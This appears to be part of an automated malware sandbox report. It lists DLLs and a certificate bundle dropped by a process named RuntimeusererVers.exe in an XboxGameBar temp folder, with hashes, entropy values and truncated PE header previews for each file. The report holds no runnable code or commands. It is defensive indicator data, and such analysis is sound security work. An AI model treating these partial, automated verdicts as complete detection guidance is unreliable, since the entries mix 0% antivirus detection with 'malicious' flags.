                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........*...D,..D,..D,...,..D,..E-..D,..A-..D,..@-..D,..G-..D,M.E-..D,..E-..D,..E,.D,M.I-..D,M.D-..D,M.,..D,M.F-..D,Rich..D,........PE..d...$..d.........." ...".b...........5....................................................`..........................................%..L...\%..x....p.......P.......>.../......8.......T...........................p...@............................................text....a.......b.................. ..`.rdata..............f..............@..@.data........@......................@....pdata.......P......................@..@.rsrc........p.......2..............@..@.reloc..8............<..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):34584
                                                                                                                                                                                                                                        Entropy (8bit):6.4080285175428715
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:aHI6RwgJ5xe3Sc88GnJ8xIPWtpu5YiSyvDIqPxWEu:CIoJ5U3Sc88GJ8xIPWtpE7SyMqPx
                                                                                                                                                                                                                                        MD5:827439C35A0CEE0DE6421AF039CA7FF9
                                                                                                                                                                                                                                        SHA1:E7FDC4624C3D4380E527EE6997D4EBDEEC353EEA
                                                                                                                                                                                                                                        SHA-256:B86E19E57A415AE9D65D4C0A86658DE2D2AD6A97617CB514A105449C9B679D89
                                                                                                                                                                                                                                        SHA-512:92F2344253ECCF24CAFDA8F5559E2FA4C21D5B0889540139278032491596EC0AC743B18D4074AE12CB15060EDFED14B243A37B23434E7B2F15998FADDA3D15F3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z*j.4yj.4yj.4yc..yh.4y%.5xh.4y%.1xg.4y%.0xb.4y%.7xi.4y..5xh.4yj.5y3.4y!.5xo.4y..9xh.4y..4xk.4y...yk.4y..6xk.4yRichj.4y........................PE..d......d.........." ...".....<......0...............................................Y.....`.........................................0D..`....D..x....p.......`.......X.../...........4..T...........................p3..@............0...............................text............................... ..`.rdata..^....0... ..."..............@..@.data........P.......B..............@....pdata.......`.......H..............@..@.rsrc........p.......L..............@..@.reloc...............V..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):50968
                                                                                                                                                                                                                                        Entropy (8bit):6.432736275046285
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:gwFMCcP4W1vqJiR5RMWlpX4Ju6r2VIPXtz5YiSyvbPxWEuw:ZFMiJifKJulVIPXt97SyjPx9
                                                                                                                                                                                                                                        MD5:E5ACEAF21E82253E300C0B78793887A8
                                                                                                                                                                                                                                        SHA1:C58F78FBBE8713CB00CCDFEB1D8D7359F58EBFDE
                                                                                                                                                                                                                                        SHA-256:D950342686C959056FF43C9E5127554760FA20669D97166927DD6AAE5494E02A
                                                                                                                                                                                                                                        SHA-512:517C29928D6623CF3B2BCDCD68551070D2894874893C0D115A0172D749B6FE102AF6261C0FD1B65664F742FA96ABBCE2F8111A72E1A3C2F574B58B909205937F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........){.G(.G(.G(...(.G(..F).G(..B).G(..C).G(..D).G(..F).G(.F(..G(..F).G(..C).G(..J).G(..G).G(..(.G(..E).G(Rich.G(........................PE..d......d.........." ...".B...X............................................................`.........................................0...X................................/......,....f..T...........................Pe..@............`...............................text...^A.......B.................. ..`.rdata..$5...`...6...F..............@..@.data................|..............@....pdata..............................@..@.rsrc...............................@..@.reloc..,...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32528
                                                                                                                                                                                                                                        Entropy (8bit):6.448063770045404
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:AuCvO+MZFryl9SDCP6rXv+mkWsniRq9IPQUkHQIYiSy1pCQqIPxh8E9VF0NykOBw:1+yF+6rX2mk599IPQUO5YiSyv3PxWEun
                                                                                                                                                                                                                                        MD5:F00133F7758627A15F2D98C034CF1657
                                                                                                                                                                                                                                        SHA1:2F5F54EDA4634052F5BE24C560154AF6647EEE05
                                                                                                                                                                                                                                        SHA-256:35609869EDC57D806925EC52CCA9BC5A035E30D5F40549647D4DA6D7983F8659
                                                                                                                                                                                                                                        SHA-512:1C77DD811D2184BEEDF3C553C3F4DA2144B75C6518543F98C630C59CD597FCBF6FD22CFBB0A7B9EA2FDB7983FF69D0D99E8201F4E84A0629BC5733AA09FFC201
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_X..1...1...1.......1...0...1...4...1...5...1...2...1.~.0...1...0...1...0...1.~.<...1.~.1...1.~.....1.~.3...1.Rich..1.........PE..d......d.........." ...".....8......................................................./....`..........................................C..L....C..d....p.......`.......P.../..........p4..T...........................03..@............0..0............................text............................... ..`.rdata..R....0......................@..@.data...x....P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):79640
                                                                                                                                                                                                                                        Entropy (8bit):6.290841920161528
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:0JltpedXL+3ujz9/s+S+pzpMoiyivViaE9IPLwj7SyZPx:07tp4i3ujz9/sT+pzqoavVpE9IPLwjHx
                                                                                                                                                                                                                                        MD5:1EEA9568D6FDEF29B9963783827F5867
                                                                                                                                                                                                                                        SHA1:A17760365094966220661AD87E57EFE09CD85B84
                                                                                                                                                                                                                                        SHA-256:74181072392A3727049EA3681FE9E59516373809CED53E08F6DA7C496B76E117
                                                                                                                                                                                                                                        SHA-512:D9443B70FCDC4D0EA1CB93A88325012D3F99DB88C36393A7DED6D04F590E582F7F1640D8B153FE3C5342FA93802A8374F03F6CD37DD40CDBB5ADE2E07FAD1E09
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......RXY..97..97..97..A...97.YE6..97.YE2..97.YE3..97.YE4..97..E6..97..96..97.]A6..97..E:..97..E7..97..E...97..E5..97.Rich.97.................PE..d... ..d.........." ...".l...........%.......................................P......V.....`.............................................P............0....... ..x......../...@..........T...............................@............................................text...:k.......l.................. ..`.rdata...t.......v...p..............@..@.data...............................@....pdata..x.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):120080
                                                                                                                                                                                                                                        Entropy (8bit):6.255942152365855
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:eZ1UnKJVckfKr0in6CL1F4TSlNdtAhfw5ymJSoEQ6MV4KUq8BIPOQXxxp:ecnoVckfjab5kQ6FPC
                                                                                                                                                                                                                                        MD5:D7B9ED5F37519B68750ECB5DEFB8E957
                                                                                                                                                                                                                                        SHA1:661CF73707E02D2837F914ADC149B61A120DDA7D
                                                                                                                                                                                                                                        SHA-256:2CE63E16DF518AE178DE0940505FF1B11DA97A5B175FE2A0D355B2EE351C55FD
                                                                                                                                                                                                                                        SHA-512:F04708C28FEB54F355D977E462245B183A0B50F4DB6926C767E8F1499E83E910B05A3023B84D398FB5DD87743FE6146DBBC3E1CAAED5351C27396F16746C6D6B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................n.....M.......M.......M.......M.......M...............I..............................................Rich....................PE..d...%..d.........." ..."............`...............................................T.....`..........................................Z..P....Z.........................../..............T...............................@............................................text............................... ..`.rdata..l...........................@..@.data................n..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):161040
                                                                                                                                                                                                                                        Entropy (8bit):6.029728458381984
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:LMaGbIQQbN9W3PiNGeA66l8rBk3xA87xfCA+nbUtFMsVjTNbEzc+pIPC7ODxd:LMaG0bN96oG1l8YA8ZMSR+E
                                                                                                                                                                                                                                        MD5:208B0108172E59542260934A2E7CFA85
                                                                                                                                                                                                                                        SHA1:1D7FFB1B1754B97448EB41E686C0C79194D2AB3A
                                                                                                                                                                                                                                        SHA-256:5160500474EC95D4F3AF7E467CC70CB37BEC1D12545F0299AAB6D69CEA106C69
                                                                                                                                                                                                                                        SHA-512:41ABF6DEAB0F6C048967CA6060C337067F9F8125529925971BE86681EC0D3592C72B9CC85DD8BDEE5DD3E4E69E3BB629710D2D641078D5618B4F55B8A60CC69D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........p...p...p....8..p.......p.......p.......p.......p..N....p...p...q.......p..N....p..N....p..N.T..p..N....p..Rich.p..........................PE..d...'..d.........." ..."............l+..............................................NS....`.............................................d...t........`.......P.......F.../...p..8...0...T...............................@............................................text............................... ..`.rdata..............................@..@.data....j.......f..................@....pdata.......P......."..............@..@.rsrc........`......................@..@.reloc..8....p.......8..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25360
                                                                                                                                                                                                                                        Entropy (8bit):6.6307231018245325
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:SR9ZfwFpEWE6ivQpIPZwGjHQIYiSy1pCQKzmPxh8E9VF0NyptVQcM:SRvqpEM4QpIPZw65YiSyvamPxWE3PS
                                                                                                                                                                                                                                        MD5:46E9D7B5D9668C9DB5CAA48782CA71BA
                                                                                                                                                                                                                                        SHA1:6BBC83A542053991B57F431DD377940418848131
                                                                                                                                                                                                                                        SHA-256:F6063622C0A0A34468679413D1B18D1F3BE67E747696AB972361FAED4B8D6735
                                                                                                                                                                                                                                        SHA-512:C5B171EBDB51B1755281C3180B30E88796DB8AA96073489613DAB96B6959A205846711187266A0BA30782102CE14FBFA4D9F413A2C018494597600482329EBF7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h%p..K#..K#..K#.q.#..K#.uJ"..K#.uN"..K#.uO"..K#.uH"..K#.uJ"..K#.qJ"..K#..J#..K#.uC"..K#.uK"..K#.u.#..K#.uI"..K#Rich..K#................PE..d......d.........." ...".....&...... ........................................p.......p....`.........................................`)..L....)..x....P.......@.......4.../...`..@...`#..T........................... "..@............ ..8............................text...h........................... ..`.rdata....... ......................@..@.data........0.......$..............@....pdata.......@.......&..............@..@.rsrc........P.......(..............@..@.reloc..@....`.......2..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):37888
                                                                                                                                                                                                                                        Entropy (8bit):5.536883608844324
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:wQm5druFG/nDOnnvM7+gu305jTbEsU4qtp3/G0mTtAeSUhCE3umLUn0qQlwwHQoY:W58OSE7Gs+D/xmTllQFqLgM6/0
                                                                                                                                                                                                                                        MD5:4B5DCC46170E4AC810A59CA5B7533462
                                                                                                                                                                                                                                        SHA1:1EACF60FDFD427909B54F83518612A4638930225
                                                                                                                                                                                                                                        SHA-256:704CDCFCA773AC658B8F84335F29630707C216F739F7FA5970B1BE57F13A5B82
                                                                                                                                                                                                                                        SHA-512:C2E5B9B40F267F375234BE9A562882FAA1A0E82F32A951233464D27879D0B1620099BB800DE3E96BE277BB3BB44FF421A98A2F0C125F28652C2B6415D0FB4DEA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........IT..'...'...'.......'...&...'...&...'..."...'...#...'...$...'.;.&...'...&.".'.w./...'.w.'...'.w.....'.w.%...'.Rich..'.........PE..d....).c.........." ...".P...H.......R....................................................`..........................................z..`....{..d...............8....................r...............................q..@............`...............................text...(N.......P.................. ..`.rdata..L*...`...,...T..............@..@.data...............................@....pdata..8...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):207872
                                                                                                                                                                                                                                        Entropy (8bit):6.104353771977755
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:Q1Krrzce1C8X3N/2AZXIQ+FvcSpOXelJfNgDdZgFqrrP:nrzxjXRhAQehgDdiFGr
                                                                                                                                                                                                                                        MD5:A7B4711C5BA1866745485ABE14101AC7
                                                                                                                                                                                                                                        SHA1:C37158CBD0FE67F8ACD61596F63CF62BD2985431
                                                                                                                                                                                                                                        SHA-256:6688F3DD5B7EFA8008C5BA776F32CECF5B42887B1B9EE21555AE3E0D4F13D2E0
                                                                                                                                                                                                                                        SHA-512:F952AD3C21B649E13E64540713A61DB6D49B394CA5D62ADD7A5FEC2186A8D27131BA038D449561B77670D3DEB2358A8254E4E205EF20228E27B1EB8234D0E843
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~~...-...-...-.q.-...-.u.,...-.q.,...-Mr.,...-...-...-.u.,...-.u.,...-.u.,...-.u.,...-.u.,...-.u.-...-.u.,...-Rich...-........................PE..d....).c.........." ...".`..........Pc....................................................`.............................................h...X...d....p.......`..h......................................................@............p.. ............................text....^.......`.................. ..`.rdata...r...p...t...d..............@..@.data....e.......>..................@....pdata..h....`......................@..@.rsrc........p.......$..............@..@.reloc...............&..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):34816
                                                                                                                                                                                                                                        Entropy (8bit):5.620393374613542
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:zVFT6fGGeAoBw4L0Slb3KFHzZgnq/A5MnOty9+AetDHVsSWBDPMEYcAe9hNugNYU:zTG3hzuot+AAaLIEYclH+uLB3
                                                                                                                                                                                                                                        MD5:2F2A2B2343549E990419DF0977E3FAC9
                                                                                                                                                                                                                                        SHA1:5724B63E32BDA7D36285F79DC9AD57FC97BA5415
                                                                                                                                                                                                                                        SHA-256:9569B0B501A0235388D075BAA4C84E5D571169AC6CE3AE9220CDE31A5F208B94
                                                                                                                                                                                                                                        SHA-512:A1B99DCAF01666C3AB9755D55001F3A18344CD70C386CE1B2233B5C6B8248B59D95804B450F9EE9C2F51D6293C4E748B9347540AE3F247418A1673BBD6EF466A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........IZ..'...'...'.......'..&...'..&...'.."...'..#...'..$...'.+.&...'...&./.'.g./...'.g.'...'.g.....'.g.%...'.Rich..'.................PE..d....).c.........." ...".L...........O....................................................`..........................................x..h....x..d....................................p...............................o..@............`...............................text....J.......L.................. ..`.rdata..:'...`...(...P..............@..@.data....L...........x..............@....pdata...............~..............@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):24064
                                                                                                                                                                                                                                        Entropy (8bit):5.3682936455537416
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:/NyocbRskh0rtT4vl8823C0/FCvNeu71vWRt7ARlgTeVycRguvNOM7:4ocd5hpdWCc3YoIIM7
                                                                                                                                                                                                                                        MD5:AA40AC7A7D1D9A10DA426701EA49508D
                                                                                                                                                                                                                                        SHA1:BBD083535E20EA00BCC40DE7B9E625FF5C74851E
                                                                                                                                                                                                                                        SHA-256:B892CBAF1A5B363FB66768194CD4D466916E81981BCB63C2989277114A4B0C10
                                                                                                                                                                                                                                        SHA-512:EAF14159F5F1B70DCB5E6416804F306EC5F4C235ABF431A27BC421861117BE8C6EC5326C8C703C4C3764B771E5DBAC37E6B93AC05F9A632BC83788C476EED8E2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ID..'...'...'.......'..&...'..&...'.."...'..#...'..$...'.+.&...'...&...'.g./...'.g.'...'.g.....'.g.%...'.Rich..'.........................PE..d....).c.........." ...".,...4......./....................................................`......................................... S..d....S..d............p.......................L..............................`K..@............@..@............................text....*.......,.................. ..`.rdata..z....@... ...0..............@..@.data...8....`.......P..............@....pdata.......p.......V..............@..@.rsrc................Z..............@..@.reloc...............\..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):301568
                                                                                                                                                                                                                                        Entropy (8bit):6.375720417060108
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:GSL1oP995ooVABNirLq0l/IzkQ37P6BdeAb6:Gh19NO7irLq0l/IzB37Pe6
                                                                                                                                                                                                                                        MD5:03EF5E8DA65667751E1FD3FA0C182D3E
                                                                                                                                                                                                                                        SHA1:4608D1EFCA23143006C1338DEDA144A2F3BB8A16
                                                                                                                                                                                                                                        SHA-256:3D1C66BDCB4FA0B8E917895E1B4D62EE14260EAA1BD6FE908877C47585EC6127
                                                                                                                                                                                                                                        SHA-512:C094A3DFBD863726524C56DAB2592B3513A3A8C445BCAAC6CFB41A5DDEC3079D9B1F849C6826C1CC4241CA8B0AA44E33D2502BB20856313966AF31F480BA8811
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........M.R.#GR.#GR.#G[..GT.#G."FP.#G.&FB.#G.'FU.#G. FQ.#G.."FP.#G."FQ.#GR."G=.#GR.#G..#G.#FS.#G.!FS.#GRichR.#G........................PE..d.....Bc.........." ...!.J...N.......*....................................................`..........................................o..T...Dp..................."......................T.......................(...p...@............`..p............................text...GI.......J.................. ..`.rdata.......`.......N..............@..@.data...x............l..............@....pdata...".......$...n..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):278952
                                                                                                                                                                                                                                        Entropy (8bit):6.049041164740881
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:QW1H/M8fRR0mNplkXCRrVADwYCuCigT/Q5MSRqNb7d86:QWN/TRLNLWCRrI55MWavdJ
                                                                                                                                                                                                                                        MD5:8D0619BFE30DEADF6F21196F0F8D53D3
                                                                                                                                                                                                                                        SHA1:E7ABD65A8CCAFEFF6CAF6A2FF98D27D24D87C9AD
                                                                                                                                                                                                                                        SHA-256:B301535DCA491D9814EA28FAA320AC7A19D0F5D94237996FA0A3B5A936432514
                                                                                                                                                                                                                                        SHA-512:5A88E4A06B98832AAA9BBB89E382F6C7E9B65C5ECBA48DE8F4FF1FA58BB06A74B9C2F6B2EC185C2A306CB0B5D68D0B28D74B323432A0B2953D8DFC29FED920D7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10752
                                                                                                                                                                                                                                        Entropy (8bit):4.663205590455457
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:qlTp72HzA5iJewkY0hQMsQJCUCLsZEA4elh3XQMtCFNGioUjQcX6g8cim1qeSju1:ql12HzzjBbRYoesfoRcqgvimoe
                                                                                                                                                                                                                                        MD5:FA50D9F8BCE6BD13652F5090E7B82C4D
                                                                                                                                                                                                                                        SHA1:EE137DA302A43C2F46D4323E98FFD46D92CF4BEF
                                                                                                                                                                                                                                        SHA-256:FFF69928DEA1432E0C7CB1225AB96F94FD38D5D852DE9A6BB8BF30B7D2BEDCEB
                                                                                                                                                                                                                                        SHA-512:341CEC015E74348EAB30D86EBB35C028519703006814A2ECD19B9FE5E6FCB05EDA6DDE0AAF4FE624D254B0D0180EC32ADF3B93EE96295F8F0F4C9D4ED27A7C0C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........=.V\..V\..V\.._$..T\... ..T\...$..T\... ..]\... ..^\... ..U\... ..U\..V\..p\.. ..W\.. ..W\.. z.W\.. ..W\..RichV\..........................PE..d......d.........." ...".....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):115712
                                                                                                                                                                                                                                        Entropy (8bit):5.890497931382238
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:rKLwVA2epJbdfD3NTSGkzsvDNIWN4ZgibPq0kgIWgymA5TGK2MLVur:rKL/dhTMzsbNd9ibPavPA5TGK7Qr
                                                                                                                                                                                                                                        MD5:2D1F2FFD0FECF96A053043DAAD99A5DF
                                                                                                                                                                                                                                        SHA1:B03D5F889E55E802D3802D0F0CAA4D29C538406B
                                                                                                                                                                                                                                        SHA-256:207BBAE9DDF8BDD64E65A8D600FE1DD0465F2AFCD6DC6E28D4D55887CD6CBD13
                                                                                                                                                                                                                                        SHA-512:4F7D68F241A7F581E143A010C78113154072C63ADFF5F200EF67EB34D766D14CE872D53183EB2B96B1895AA9C8D4CA82EE5E61E1C5E655FF5BE56970BE9EBE3E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
